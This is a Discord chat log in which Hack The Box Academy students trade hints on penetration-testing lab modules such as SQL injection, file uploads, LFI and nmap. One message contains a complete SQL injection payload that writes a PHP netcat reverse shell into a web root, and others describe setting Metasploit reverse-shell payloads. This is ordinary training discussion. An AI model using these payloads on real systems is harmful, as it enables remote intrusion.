#modules


low dirge
#

I would say it is neither easy nor hard. Everything you need to know is included in the modules. It is not one to one though

night zealot
#

Oh I understand, then I guess that I will take note about everything, is it theoretical or practice like OSCP?

mortal basin
# night zealot Oh I understand, then I guess that I will take note about everything, is it theo...

The exam is 100% hands-on for a duration of 7 days. You can read more about it here:

https://academy.hackthebox.com/preview/certifications/htb-certified-bug-bounty-hunter/

night zealot
#

I really appreciate it, I'm going to take a look thank you!

acoustic owl
worldly reef
#

Anyone here who can give me lil nudge on search foothold?

#

Oops srry wrong place

west canopy
#

@acoustic owl You got this bro!

tight mesa
#

anyone can give me a hint where the flag can be at LFI and File Uploads module?

#

I could upload the webshell but couldn't find the flag

west canopy
#

@tight mesa which section(s) ?

acoustic owl
tight mesa
west canopy
#

@tight mesa check the root directory

#

ls /

tight mesa
#

I did already

west canopy
#

the file name of the flag is a long string of random numbers and letters

tight mesa
#

doesn't work

heady nova
#

without GIF8

tight mesa
#

gotcha

west canopy
#

Yea the GIF8 is just a side effect of the shell we are using.

tight mesa
#

ty guys

dense ferry
#

Could someone give me a tip for the Broken Authentication Skill Assessment? I am logged in as support, but I can't figure out what the next step should be

west canopy
#

Edit: Removing spoilers

dense ferry
lethal atlas
#

Can someone give me a little nudge on the skills assessment of Web Service & API Attacks.

#

I have a root shell, have looked over some files but I cant seem to fuzz any parameters. I have also found credentials for eporter but not sure if that helps

drifting knoll
#

@west canopy @tight mesa guys be careful with spoilers

dense ferry
sweet heron
#

Quick question. Which service would be faster to crack: ftp, ssh or smb?

fierce atlas
#

for sure not ssh

sweet heron
#

at best on my VM using half my cpu, ssh gives me 128 tries/min and ftp 272

opaque fiber
#

I am on the windows machine from Junior Pentester > Shell & Payloads > Reverse Shell and pasting the client/target windows 10 Reverse shell command get an error (I changed my ip and also tried port 4242)

#

oh well base64 works

raven cairn
#

Hello. I would like some help on SQL Injection Fundamentals, section: reading files.

#

I don't know anything about PHP so I am confused what to do, and how to do it.

west canopy
#

@raven cairn DM me 🙂

long bone
#

Could I get any help with the last question of the Active Subdomain Enumeration module in Information Gathering - Web Edition: "Submit the number of all "A" records from all zones as the answer." I assumed that I could get that with a simple "dig a" command within the different zones and just calculate it that way. I feel like an idiot, a nudge would help. Thanks

west canopy
#

@long bone I think I counted all A records from the two zones manually (inlanefreight.htb and xxxxxx.inlanefreight.htb)

long bone
west canopy
#

yep

long bone
sweet heron
#

In file transfer module, why do they use python3 import urllib.request ..... instead of python -m http.server? It's so much easier and faster. Am I missing a point. In the linux section.

west canopy
#

@sweet heron I think because that is using python to download a file from a server. Rather than starting your own HTTP server to host a file

sweet heron
#

yeah they use an url in the example instead of a webserver like I'm doing.

sweet heron
#

I'm stuck in creds hunting in linux of the password attacks module. I've found nothing for user will. I'm already in with kira.

distant stream
hallow veldt
#

I can't execute id command after running the exploit

#

nvm i forgot to use set payload generic/shell_reverse_tcp

leaden quail
#

hey guys im struggling with SQLMap Essentials - Bypassing Web Application Protections

#

im using for the tasks what it is explained in the description but im not able to find the flags.

#

Any hints?

rustic sage
#

Hi, I'm on WordPress / Skill Assessment and I am stuck with the question about unauthenticated download. I found a vulnerable plugin, I know how to exploit it to download a file, but I don't know what file to download. Any hints?

tacit topaz
sweet heron
tacit topaz
#

Can I dm someone who finished wordpress module ?

west canopy
#

@tacit topaz DM me 🙂

#

@rustic sage Try looking on exploit-db, you can find an example proof of concept command

tacit topaz
heady nova
#

Hello, can i have a nudge for SQLi Skill Assessment ?

rustic sage
#

general question in Using Web Proxies: Repeating Requests. so i found the initial flag. im trying to figure out how to cd into the other directories. any help would be appreciated.

#

using burpsuite

west canopy
#

@rustic sage so you can't really Change Directories, but you can use the ls command to enumerate other directories

#

Because it's not a fully interactive terminal , it's not like you can move around and change your working directory. Any command you make through burp, your working directory will be the web root for the server

rustic sage
#

ahh ok that makes sense.

short lynx
#

Hey, I'm stuck on the final task in the skills assessment of the hashcat module. I've cracked all the hashes and found the most common but apparently it is not right ||frequency of 18|| Anyone know where I have gone wrong?

daring yarrow
#

Hey, can anyone help me with timelapse machine ?

storm shore
#

Hello i am doing the Web requests module, and i am at the "PUT & Delete" section, and i am not sure what i am doing wrong. i am supposed to get a table of contents, but i am getting this error message instead

heady nova
#

sudo apt update && sudo apt install -y jq

storm shore
heady nova
#

which jq => if no result, not installed 😄 (or path misconfigured)

tender dock
#

Kudos to @mortal basin for the Intro to Assembly module. Having so much fun with something I didn't touch since uni. Having an issue, though, with the Procedures part -- final question of that part, none of the addresses that appear on top of the stack, stepping through and into Exit appear to be correct. Anyone with a hint on where I am going wrong?

west canopy
#

@short lynx if you are still having problems feel free to DM me 🙂

wild badge
#

Hi everyone! Could somebody please help me with Web Service & API Attacks - Skills Assessment? How to use sqlmap or test for SQLi if the service always hangs?

tired cliff
#

Hi everyone, just wondering if i might be able to get some help on Web Requests - GET section -

The exercise above seems to be broken, as it returns incorrect results. Use the browser devtools to see what is the request it is sending when we search, and use cURL to search for 'flag' and obtain the flag.

I have followed course material to the letter but for some reason i just cant seem to get this question. I am really flying blind on this... I dont think that the course material really explains what we are doing and what we are supposed to do very well. honestly i have gone down this page about 20 times and I still dont know whats going on... where is this flag!!

rare jackal
#

Could I please get some help with Web Services and API module.. ?

tired cliff
raven cairn
#

I need help on SQLMAP essentials, section: Running SQLMAP on an http request, case #3.

west canopy
#

@raven cairn try setting the cookie id as the injection point

raven cairn
#

Is this what my command would look like?

#

because this doesnt work : (

west canopy
#

and keep the --cookie like you have it now

#

i think you need to add -u before the target URL as well

raven cairn
#

@west canopy I just got the flag but in a very different way.

tired cliff
#

Ok... another speedbump i am following the instructions in Web Requests - GET section.

We see that the result is sent as a JSON string. To have it properly formatted in JSON format, we can pipe the output to the jq utility, which will format it properly. We will also silent any unneeded cURL output with -s, as follows

I put the following command in 'using the appropriate Server_IP and Port'

curl -s http://<SERVER_IP>:<PORT>/api.php/city/london | jq

and i get this when i initiate it:

bash: jq: command not found
(23) Failed writing body

Am i missing something???

west canopy
#

@tired cliff need to install jq. Try the command: sudo apt install jq

tired cliff
west canopy
stone jacinth
#

hmm

raven cairn
#

I also need some help on the web requests module, section Zap scanner. I was able to spider and aggressive scan the site. I found || Remote Os Command Injection || . I've been trying to exploit this for a while. How should I do it? I've been trying to enter commands in input boxes, but it doesn't seem to be working.

west canopy
#

@raven cairn DM me 🙂

inner frigate
#

Hi all, I wrote this also on community help, but maybe more relevant here. I am finding 3 questions in the OSINT module impossible to submit correctly, and I posted the summary here, can anyone give me some guidance on it? https://forum.hackthebox.com/t/osint-corporate-recon-impossible-first-question-on-location/255704

knotty hemlock
#

Hi, has someone finished the section "Active Directory Search Filters" in the "Active Directory LDAP" module? I'm stuck at the question "Find the name of an account with a ServicePrincipalName set that is also a member of the Protected Users group." Found the name of two accounts but neither one is accepted. 🥲

exotic ginkgo
#

I am stuck on Skills Assessment - Web Fuzzing "One of the pages you will identify should say 'You don't have access!'. What is the full page URL?" all of the pages found I try to access are blank or forbidden. I am writing generically in an attempt to not share information.

stone jacinth
rustic sage
rustic sage
#

Someone finished the WordPress Skill Assessment? I'm wondering on what file the unauthenticated file download should be done. It's the only question with a hint, but it's quite unclear to me. I tried to MySQL database as the answer but it seems not to be this.

west canopy
#

@rustic sage DM me 🙂

west canopy
#

@knotty hemlock if you still stuck feel free to DM me

south spoke
#

LOPA

#

JUMANJI LICKS IT

#

@half harborYONE ARE U

#

@high zinc HI

high zinc
#

hi

languid dawn
#

Don't drink and discord

devout cliff
#

^

torpid ermine
#

anyone please give me a nudge in file uploads module skill assessment

heady nova
#

Hello, can i have a nudge on Network Enumeration with Nmap - Service Enumeration ?

Impossible to get hold of the flag 😱

livid pier
#

@tender dock Hey you want to pass along any useful info? Ive been stuck on that procedures section for a bit

west canopy
#

@heady nova try connecting to one of the ports using netcat

rustic sage
#

so im stuck on Using Web Proxies : Repeating Requests

devout cliff
#

i just finished that part, what are you stuck on

rustic sage
#

i cant seem to navigate anywhere

#

i was able to ls and find the initial flag but past that im kinda lost

devout cliff
#

are you using cd ..?

#

or cd in general?

rustic sage
#

no

devout cliff
#

what are you using

rustic sage
#

i used ls to find the flag and cat to open it

devout cliff
#

ok so my suggestion

#

is to enumerate the directory you are in

#

and work from there

#

and i dont mean the files in the directory, i mean the directory itself

rustic sage
#

so i ran the spider and found a robots.txt file but i cant open it

devout cliff
#

nope not gonna be that

#

you just need a much much simpler command

#

linux basic command

#

if you dont know where you are in your own file system what do you use to find out

rustic sage
#

ima take a step back and clear my head for a bit. i may be overthinking this

devout cliff
#

yeah just think of basic terminal commands

rustic sage
#

thanks for the pointers.

devout cliff
#

np

#

if you still cant figure it out soon pm me

west canopy
#

@rustic sage check the root directory

rustic sage
#

i found it. thanks everyone!

west olive
#

hi

#

i am at web requests...

#

could anyone help me with the GET section?

manic zealot
#

guys i need help in information gathering - web edition, Active infrastructure identification section questions. I tried whatweb and got execution expired, tried curl and got timed out, haven't tried aquatone yet. I nmapped it and it gives filtered state. I really need a hint.

manic zealot
west olive
#

what do you mean change the search parameter?

manic zealot
#

curl "http://IP:PORT/search.php?search=THINGS"

#

words after question marks are parameters

west olive
#

oh

#

thnks

manic zealot
#

👍

devout cliff
#

ok why is this part of Using Web Proxies taking this long. im just trying to fuzz for this file via Burp Intruder. i know that its throttled by the free version but couldnt the module just have the file name early in the list? ive gotten up to 250+ requests and still not hitting the .html file

west canopy
#

@devout cliff it should only take about 50 requests before you get a status code of 200

devout cliff
#

notlikethis

#

ok

#

using the wordlist they talk about in the module?

west canopy
#

yea i think its called common.txt or something like that

devout cliff
#

yep. are you still supposed to use a regex to filter out the '.' in the wordlist?

#

ok i found out what i did wrong

#

nvm

#

i tried to target IP/admin instead of having it in the pointer

pearl geyser
#

Hey guys, ive just started playing around with HTB and Kali linux and I had some questions. I am currently on the "System Information" module (first after the introductory) on the SSH connection section. The problem is I closed my PWNBox earlier and since I can only open it once a day I decided to run the modules on a Kali VM instead. The problem im getting is that when I try to do the SSH command: "ssh htb-student@10.129.176.178" nothing happens. There is no error message, nothing

#

and its strange, it no longer lets me type out commands as the user or anything. Whenever I type its on a blank line, and it doesn't show me my user or directory or anything. Even if i type "exit" nothing happens

devout cliff
#

ctrl+z

pearl geyser
#

oh, ty...

#

any tips as to why it wouldn't be working? Anything you can point me to? Or was the model designed to only be completed via the virtual PWNbox?

devout cliff
#

are you supposed to just be SSHing into the box?

pearl geyser
#

yeah, i believe so. The module provided me with target IP & user along with the password. There are questions to answer once I connect to the target computer. The only issue is I closed my PWNbox for the day, and I need to wait 24 hours, so i am trying to do them on a Kali VM

devout cliff
#

i think you might need to set up an openvpn first before you can ssh into the box.

#

i havent done that module in awhile

#

what is the name of the module?

pearl geyser
#

Linux Fundamental > System Information

devout cliff
#

ok

pearl geyser
#

Its under "System Information" under "The Shell" in Table of Contents

devout cliff
#

yeah i think you need to set up your openvpn first

#

before you ssh

#

so do that and then try again

#

if you dont know how to do that there should be a tutorial in the academy on how

pearl geyser
#

i appreciate it, ill do some digging around!

devout cliff
#

it should be pretty easy, just download the vpn key that is next to 'cheat sheet' and use that file for your openvpn command

pearl geyser
#

in theory, I should be able to complete this module in a Kali VM, right?

devout cliff
#

yeah i dont see why you couldnt

pearl geyser
#

wicked, cheers

devout cliff
#

although for full disclosure im using parrot security

pearl geyser
#

Yeah, I wasn't too sure where to begin so I found Network Chucks videos and he recommended Kali

#

I can always boot up another VM with parrot

devout cliff
#

i think it will be fine

rustic sage
#

so im trying to run "auxiliary/scanner/http/http_put" and im getting a file doesn't seem to exist. the upload probably failed

#

USING WEB PROXIES: proxying tools

pearl geyser
# devout cliff i think it will be fine

Hmm, so I've managed to get a bit further but I am still unable to connect... I found the VPN key on the module and googled how to setup the VPN connections in Kali but its still giving me this error, not sure why

devout cliff
#

ok so you got the vpn set up in another terminal window and its running correct?

pearl geyser
#

I believe so, but i didnt do it in terminal, i used the gui

#

I just uploaded the file to the built in VPN on Kali (top right of the picture)

devout cliff
#

ok try refreshing your target you are sshing to and try again

#

maybe the box is not working

#

make it give you a new target

pearl geyser
#

ahh kk

#

you are correct! How silly of me haha

#

Thanks again

devout cliff
#

np

rustic sage
west canopy
#

@rustic sage I wasn't able to get the exploit to work either, but you can find the solution to the challenge question just by looking at the Options of the exploit 😉

devout cliff
#

i figured this out i just didnt know if he got it yet

#

im trying to figure out something real quick and then can help if you still dont have it

rustic sage
#

ah ok. ill take a look. thanks for the help!

devout cliff
#

i really wish ZAP had a ascii hex encoder

#

built into their fuzzer Q_Q

#

ok what parameters did you set in metasploit

#

you shouldve set your 'use', 'PROXIES', 'RHOST', and 'RPORT'

#

and then run

rustic sage
#

yes

#

rhost was set to the ip i used in the previous exercise as well as rhost. i think that is where i messed up

devout cliff
#

so what i did

#

i used googles dns server

#

so 8.8.8.8 and port 53 respectively

#

and proxied through 127.0.0.1:8080 like it instructs

rustic sage
#

ok will give it a try. i get a little freaked out doing this stuff on actual websites. so i was trying to use the one i used prior

devout cliff
#

its not gonna hurt anything. its just a query

#

and its google

rustic sage
#

ok

devout cliff
#

so just make sure all your parameters are set up right

#

and you should be fine

rustic sage
#

ok thanks!! much appreciated!

devout cliff
#

basic toolset path finally done

#

canyoufeelitnowmrkrabs

rare jackal
#

Can I please get some helps with log poisoning part from File inclusion?

slow bluff
sweet heron
#

I'm looking to ssh into a target. I have only access to ftp and I see its ssh priv and public keys, but I can't seem to edit via ftp the authorized_keys (nor put my own file) to add my own key. How does ippsec do it already? I know I saw him do something with ssh-keygen...

west canopy
#

@sweet heron Footprinting Easy lab?

sweet heron
#

No, it was password attacks easy lab. But I figured it out.

#

Ty

rustic sage
#

fuzzing with burp sux...

west canopy
#

@rustic sage Yea it's slow haha

rustic sage
rustic sage
#

Good morning/evening/../../../../night, dont suppose anyone can point me on the right track with the first skills assessment on "attacking common applications" (attempted searching for public exploits, poking around at abusable functions(couldnt find any) attempting to poke jenkins(which obviously didnt feel right) and attempted to look for directories ffuf) 🧐

west canopy
#

@rustic sage DM me 🙂

edgy cedar
#

How it feels like answering module questions

kindred scroll
#

Hello, I am trying to get a reverse shell from a PHP server in SQL Injection fundamentals module. I am using this:

cn' union select "",'<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> >/tmp/f"); ?>', "", "" into outfile '/var/www/html/shell.php'-- 

(I am replacing the IP and Port placeholders ofc).
But it just doesn't work.
Web shell does work but I don't like it

smoky forge
#

Hey guys, from getting started module knowledge check session I tried to upload shell file with js disabled. It works but can't reach to gettingstarted.htb/data/uploads/shell.php%. So I can't get reverse shell. Pls advice me any tips. Thanks!

kindred scroll
#

I would recommend to just use metasploit

#

Or maybe it's a diff submodule lol

#

can you tell me which one you are talking about

smoky forge
kindred scroll
#

So first you have to obtain the plugin information.
Then just search plugin name in msfconsole.
Use the one with unauth in the name, the authenticated one doesn't seem to work.
set rhosts, lhost.
set payload to generic/shell_reverse_tcp.

#

I did something like that

#

All of this is mentioned in prev lessons so it isn't a spoiler 😄

dry pumice
#

can someone help me with the nmap module at Service Enumeration ? I don't understand how to find the flag...

gloomy sigil
#

Hi, I'm trying to import the provided zip file from AD BloodHound module but I just get "File created from incompatible collector". Can someone help me?

tacit topaz
#

Hi I'm trying to do the skill assessment of the web service and api attacks but i'm a bit stuck can I get some help plz ?

#

Nvm I found the flag !

#

Not with the expected method but I get the flag 😄

maiden slate
#

Has anyone completed the 'Service Login' portion of the 'Login Brute Forcing' module? I need a little guidance.

dry pumice
#

Sorry, I found it by myself

lethal atlas
drifting knoll
lethal atlas
maiden slate
#

@lethal atlas Nice job on getting that done bro!

smoky forge
kindred scroll
verbal mirage
#

Hey, I need help with the Assessment of "Broken Authentication". I try to bruteforce the support login. I filtered rockyou.txt with the password requirements. But still cannot find the correct password. Is there anyone who can provide help?

livid pier
lethal atlas
#

Thanks bro.

molten epoch
#

hey i need help with module Getting started Section Service scanning the question asks me to identify the non default port that the telnet service is running on i understand that i run nmap but i dont understand what im looking for in the nmap results

lethal atlas
#

what do your nmap results show?

#

feel free to dm me

rustic sage
#

im running intruder attack in burp in the USING WEB PROXIES: BURP INTRUDER: i cant seem to get it to find the admin page . this is the second time ive run the attack the machine runs out of time before the attack is done. any suggestions?

devout cliff
#

DM me

plain cypress
#

Anyone done the Academy module web proxies....specifically repeating requests? I cannot figure out where the flag is..... i have looked through a bunch of directories in /var/ and /var/www/html/public/ cannot find anything

west canopy
#

@plain cypress check the root directory

#

@rustic sage are you running the intruder against: GET /admin/$FUZZ$.html ?

plain cypress
west canopy
west canopy
#

@dry pumice Try connecting to one of the ports with netcat 🙂

plain cypress
west canopy
#

np 🙂

west canopy
#

@rustic sage if you get stuck feel free to DM me

rustic sage
late beacon
#

Anyone figure these questions out (Attacking Common Applications)?

#

I can't find the flag

west canopy
#

@late beacon Wordpress Discovery and Enumeration?

late beacon
#

Yea that one, I looked in /wp-includes but didn't see it

west canopy
#

DM me 🙂

heavy edge
#

im having issues with the getting started course. specifically the public exploits section. 1) the IP is constantly dropping. i can visit it once and see its a WP page but afterwards it wont come back up. i cant ping it etc 2) which WP exploit do i use. there are like dozens on dozens and i really dont want to try every single one.

#

i know imma newb. pls dont laugh

#

ill try that one thank you

west canopy
#

@heavy edge My posts may have been too spoilery --- if you get stuck feel free to DM me !

acoustic owl
lethal atlas
heavy edge
#

just finished priv escalation

#

if you need help you can ask me for tips

#

gonna run through it a few times to get it down 100%

west canopy
#

Get it big dawg!

broken bronze
#

anybody a hand on assembly module?

manic zealot
#

guys i need help in information gathering - web edition, Active infrastructure identification section questions. I tried whatweb and got execution expired, tried curl and got timed out, haven't tried aquatone yet. I nmapped it and it gives filtered state. I really need a hint.

west canopy
#

@manic zealot DM me 🙂

flint helm
#

Hey I'm stuck at File Uploads Skills Assessment I've found a payload that gets through but I don't know where it is stored. I know I should read the source code of upload.php but I don't know how, I can't seem to read it via XXE and I've also read the source code of script.js but it doesn't help either. So I would really appreciate a hint.

west canopy
#

@flint helm DM me brah i got you!

unreal beacon
#

Good evening guys, hope everyone is fine. I'm having difficulty understanding this exercise in the Web Requests module. I found the flag request in the devtool but what should I type in the answer box? Also the png on this section of the module is not working and I didn't have the chance to look at it

west canopy
#

@unreal beacon try navigating the flag in your browser, or use CURL from your terminal

unreal beacon
ionic summit
#

Anyone for a sanity check on the final skills assessment on the SQLMap module? I'm having trouble getting the payload right. Thanks!

ionic summit
#

Yes...sorry, left off the Essentials. That's the one.

devout cliff
#

dm me what you got i finished that module

#

see if i can remember what i did

#

OH THIS ONE

#

haha

devout cliff
sweet heron
#

I have a question on medium lab on password attacks. Do I really need to bruteforce ssh with the second user I found? Trying hydra on smb gives me an error "does not support SMBv1"

rustic sage
#

For Host and Port Scanning within Network Enumeration with Nmap, what is the target system IP?

heavy edge
#

got the usr flag on knowledge check for getting started on to the root tomorrow

sweet heron
#

Click the green text: "Click here to spawn the target system!" ...

heavy edge
#

if you need help with the usr flag and half of root lmk i was so close then the machine died so i had to respawn it

sweet heron
rustic sage
rustic sage
heavy edge
#

so you download the ovpn file

#

and then init it thru terminal

#

udp or tcp which ever u want

rustic sage
#

Yes, but I'd need to edit the config file

#

Does academy HTB support openvpn over TCP? or just UDP?

sweet heron
#

I know you get to choose on the main htb website, but not for academy.

#

I've completed 17 modules and never found out I was using UDP xD

heavy edge
#

why would you need to edit?

#

they support ovpn over tcp

#

you can download a tcp file

rustic sage
#

I see the option. It just wasn't in the module. Sometimes you need to edit the config file for openvpn to change the settings. My campus internet has UDP port 1194 blocked

#

So I need to use openvpn via TCP 443

hazy grotto
#

SMTP Footprinting. Anyone available to help?

rustic sage
#

For enumerating the hostname with DNS, which flags should I use? In 'Enumerating with nmap'

sweet heron
#

which module section?

unreal beacon
#

JAVA DEOBFUSCATION

#

First question

sweet heron
#

It's the answer of another question.

#

You're one step ahead 😉

unreal beacon
livid pier
#

spoiler?

rustic sage
#

Within Host and Port Scanning in the module Network Enumeration with Nmap, how do you enumerate the hostname? I've tried --resolve-all -R and the -A flag?

west canopy
#

@rustic sage -A should give the hostname 🙂

rustic sage
#

<spoiler>nix-nmap-default</spoiler> Is what I get, and it says nmap does not recognize default name

west canopy
#

but that's the answer to the Challenge Question

#

in the section

rustic sage
#

I didn't have it as case sensitive :///

broken bronze
#

anybody can help me with assembly module

hazy grotto
#

Thanks @west canopy

late beacon
#

Anyone figure out the last question for the Attacking Common Applications assessment?

#

I know it has something to do with cgi but I can't find the file

west canopy
#

@late beacon Skill Assessment 1 or 2?

late beacon
#

First

west canopy
#

DM me 🙂

raven cairn
#

@west canopy Can i dm a stupid question?

west canopy
#

sure

#

i might have a stupid answer!

manic ermine
#

Hi, is anyone available to give a nudge on the "Web Attacks" skills assessment? I am a bit stuck

sweet heron
#

Footprinting module, smb. I can't seem to find the custom version of the share (or I can't find the good format to input the answer).

west canopy
#

@sweet heron try connecting with rpcclient and enumerate the shares that way

sweet heron
#

they wanted all the line! Thanks

manic ermine
west canopy
#

@manic ermine try changing the Request type by right clicking in burpsuite 🙂

urban sage
#

@plucky plover No. It's not because you aren't using pwnbox. I did it without yesterday. Unless a VPN key is provided target instances are publicly available.

urban sage
#

Neither should affect it here.

plucky plover
urban sage
#

You should be able to at least connect to the server with that.

plucky plover
urban sage
#

I'd try resetting and then make sure you use the newly assigned IP and port.

plucky plover
#

Ill try that once i try on windows

#

maybe my vm just doesnt have good internet connection

#

nope same thing

#

ill try getting new ip and port

#

@urban sage it worked, i guess that other port and ip was just bugged

#

thanks a lot for the help homie

urban sage
#

fingerguns Excellent. Happy hacking!

sharp citrus
#

anyone done with information gathering

#

can i ask for your help in private

#

i got many questions

hardy kindle
#

uhm can anyone help me out with command injection skills assessments. It is Tiny File manager. Most exploits that I see are for non read only users. I tried everything taught in the modules for command injection

ancient ivy
#

Could someone PM me, i have some issues with 'active subdomain enumeration' in the 'information gathering - web edition' module

ancient ivy
#

i am stuck and i would like to make sure i am understanding correctly

kindred scroll
#

Hello, why is it mandatory to split subnets in x % 2 = 0 amounts ? Why can't I split /24 into /27?

tender dock
# kindred scroll Hello, why is it mandatory to split subnets in x % 2 = 0 amounts ? Why can't I s...

What do you mean? You wouldn't split /24 further?
Where have you read that? I mean, why wouldn't you be able to segment the network in odds?

❯ sipcalc 10.10.10.0/27
-[ipv4 : 10.10.10.0/27] - 0

[CIDR]
Host address            - 10.10.10.0
Host address (decimal)  - 168430080
Host address (hex)      - A0A0A00
Network address         - 10.10.10.0
Network mask            - 255.255.255.224
Network mask (bits)     - 27
Network mask (hex)      - FFFFFFE0
Broadcast address       - 10.10.10.31
Cisco wildcard          - 0.0.0.31
Addresses in network    - 32
Network range           - 10.10.10.0 - 10.10.10.31
Usable range            - 10.10.10.1 - 10.10.10.30

cold marsh
#

hi all, i have an issue with the last question of Web Requests Module.
i have replaced all city_name with 'flag' - then i have deleted all. after this job when i call for /api.php/city/flag the flag does not pop on my console. any hint?

tender dock
kindred scroll
#

Not an exercise

#

It is a general lesson

#

So I can split a network in 3 subnets?

tender dock
#

Yes, you can. The powers of 2 thingie is adhered to by using /27, btw. You get 32 addresses.

#

I'd suggest using sipcalc/ipcalc to experiment and find what makes and does not make sense when segmenting a network

kindred scroll
#

Yeah I wanted to experiment and I did split a /24 network by 3 on paper and it worked perfectly

#

So I was confused about what they said

tender dock
#

Tends to happen, know the feeling 🙂

kindred scroll
#

Thanks for the help

manic ermine
#

Did you ever get an answer to this?

kindred scroll
# cold marsh anyone can help me?

I actually had a similar issue but I somehow fixed it and then forgot how I did :D. Maybe try renaming a different city or resetting the machine

cold marsh
#

its part of academy, it's impossible to reset it

#

okay.. ill try to wait until the rest

kindred scroll
#

If you did everything correctly and it is indeed a bug you can dm for something 😄

rancid tide
#

a lot of time is the name the prob

#

*times

cold marsh
rancid tide
strange arrow
#

Hello.. can anyone help me to connect to a windows system using xfreerdp.? I'm trying to complete the Windows Fundamentals Module, but I am unable to connect to the Windows System as mentioned in the exercise

tender dock
tight mesa
#

hello everyone, who can give me a hint with "Server Log Poisoning" under LFI | Path Transversal module, I'm stuck..!!!

#

I'm doing exactly the same as was explained in the content but I can't receive the poisoned response from the server once the web shell was sent..!!!

broken bronze
#

Can anyone help on assembly part 2 assessment

arctic torrent
#

Hi

#

I'm stuck on the question: How large can our shellcode theoretically become if we count NOPS and the shellcode size together? (Format: 00 Bytes)

#

Here, suggests using msf modules like blabla_pattern.rb

#

But I can't find it

jolly python
#

Anyone completed the bloodhound module that can help. I only have the very last question to go. Find the percentage of users with a path to Domain Admin.

jolly python
#

Nevermind. I finally figured out.

west canopy
#

@arctic torrent just need to add these two numbers together 🙂

strange arrow
#

how do I connect to the Windows Spawn machine with my VM... I've connected through the openvpn, but I am unable to connect xfreerdp to the IP.

#

it always gives me "faild to connect" error

blissful verge
arctic torrent
#

thanks

#

it's true

mellow whale
lethal atlas
raven cairn
#

The sqlmap section is pretty darn difficult. Could I have some help on case#6 ? (sqlmap essentials attack tuning)

#

The hint is to use the prefix ')

#

I've tried quite a bit for a while but I haven't been having luck

twin gulch
#

Can anyone help me with hydra http-post-form ?

lethal atlas
jagged zenith
heavy edge
#

just finished getting started

#

if you need help lm

#

lmk

mellow whale
serene rain
#

[Broken Authentication - Skill Assessment]
Hello ! I know that some people asked about this exercise but I can't find another account (other than 'support') using the message sender page. I have tried different department names (such as office, it, hr etc.) with country codes (es, eu, fr etc.) but I'm unable to find an account 😦
My syntax : department.xx
Does anybody have an idea please ? 🙂

lethal atlas
serene rain
#

Okay, @jagged zenith helped me in PM, thanks 🙂

serene rain
jagged zenith
#

!rank

frigid summitBOT
hardy kindle
#

Has anyone completed command injection skills assesment that could help me out?

rancid tide
#

guys please help me. In the file inclusion module, Automated Scanning, it tells me to perform a scan with ffuf to find an "exposed parameter" to do the task, but ALL the parameters in the file work during the fuzzing, but none of them work properly. Am I doing something wrong or is there a problem??

west canopy
#

@rancid tide first you need to fuzz to find out the actual parameter name. And then do a second fuzz for the value 🙂

rancid tide
#

yes

#

but why

#

all the parameter are good

#

I DON'T UNDERSTAND WHY

#

AND NO ONE WORK

west canopy
#

Once you find the parameter name , when you fuzz for the value you will see results with either a size of 1935 or 3309.

#

The ones with size 3309 are valid

#

@hardy kindle DM me 🙂

rancid tide
west canopy
#

@rancid tide if you get stuck feel free to DM

rancid tide
broken bronze
#

Can anyone help with assembly module?

fast timber
#

can anyone give me a hint for the Broken Authentication Module, second question on Weak BruteForce Protections?

manic ermine
#

is anyone able to help me out with the Password Attacks module? The first part on network services asks to identify the user for the service then bruteforce the password. Other than using CME to work through each pass/user combo is there some way to identify the user first more quickly?

west canopy
#

@fast timber you don't actually need to brute force credentials, just send an HTTP request with the X-Forwarded-For header along with an acceptable IP address

sweet heron
devout cliff
#

in the Information Gathering module, it asks for the admin email contact for venmo.com domain. yet it isnt listed via WHOIS. is there supposed to be another way to find it

devout cliff
#

its not listed in there. the email that is the answer

lethal atlas
#

dm me

devout cliff
#

nvm got it

#

vpn was blocking the rest of the info

lethal atlas
#

strange but good deal you got it

devout cliff
#

yeah weird

fast timber
#

tried a bunch of stuff already

#

but nothing

manic ermine
broken bronze
#

Can anyone help with assembly

rare jackal
#

Could someone please help me with "Edit the php.ini file to block system(), then try to execute PHP Code that uses system. Read the /var/log/apache2/error.log file and fill in the blank: system() has been disabled for ________ reasons." from the File inclusion part?

west canopy
#

@rare jackal you can actually just google to find the error message 🙂

rare jackal
#

I think i'm very close... thanks i'll message you

devout cliff
#

the absolute first section

sweet trench
#

hello, the first section is the one which says "introduction"

#

cause its the first section of that module

#

no problem

vestal spruce
#

I might just be dumb but I don't see a "Enumerating GPO" section anywhere

#

In the bloodhound module

rustic sage
#

is there a trick to getting the zap hud to work?

#

i cant interact with the sites

#

it keeps telling me to add the site to the scope i click add and nothing happens.

manic ermine
west canopy
#

@rustic sage I had to use Zap's built in browser to get the HUD to show up

rustic sage
west canopy
#

If you are trying to use zap scanner you can do it without the HUD

rustic sage
#

im "attempting" to use the scanner lol

sweet heron
#

Any hint on brute-forcing attacks' hard box?

frigid summitBOT
#
Roseme#2867 has been warned

Reason: Mass mention

lethal atlas
sweet heron
#

The last one, the hard lab.

lethal atlas
#

which module?

livid pier
#

😂

lethal atlas
livid pier
#

lol

#

people get sections and modules mixed it seems

lethal atlas
#

I cracked Paper today on HTB

west canopy
lethal atlas
#

totally could have been made by Dwight

sweet heron
#

xD My bad, I've messed up the name: Password Attacks, not brute-forcing attacks!

rare jackal
#

Does anyone know for file uploads part limited file uploads I'm at doing file:///flag.txt but does show empty?

lethal atlas
#

I havent done Password attacks.

#

I have done File Uploads however

west canopy
#

@rare jackal that should work. Maybe there is a problem with your XXE?

livid pier
rare jackal
#

Maybe..

#

Let me try again @west canopy

sweet heron
#

Basically, I want to download a keepass file from a windows box where I have no admin privs nor internet.

lethal atlas
#

Im afraid thats not really what we do here

west canopy
#

pretty sure you need internet to download a file

sweet heron
#

I meant transfer to my host.

#

This module is nice, but frustrating at the same time. (Password Attacks)

sweet heron
#

FTR, I've found a way using base64

rare plank
#

Yo can someone help me with HTTP request plz dm if you can

west canopy
#

@rare plank i got you brah 🙂

livid pier
rare jackal
#

For Skills Assessment - File Upload Attacks, can anyone share what file extension list you used? I can't seem to iterate with my list.

barren summit
#

same here, no ssh user and password provided. did you figure out what to do?

lucid mirage
#

Anyone can help me with the 1st question of FOOTPRINTING/DNS? what's the expected answer? I've tried multiple times. They're all wrong.

#

enumerate the FQDN of it for the "inlanefreight.htb" domain

lucid mirage
#

Thanks @feral gyro . problem solved.

glad orbit
#

Someone can help me to find the ldapadmin password and help me escalation the privilege in the "Windows Privilege Escalation Skills Assessment - Part I"?

steep sable
#

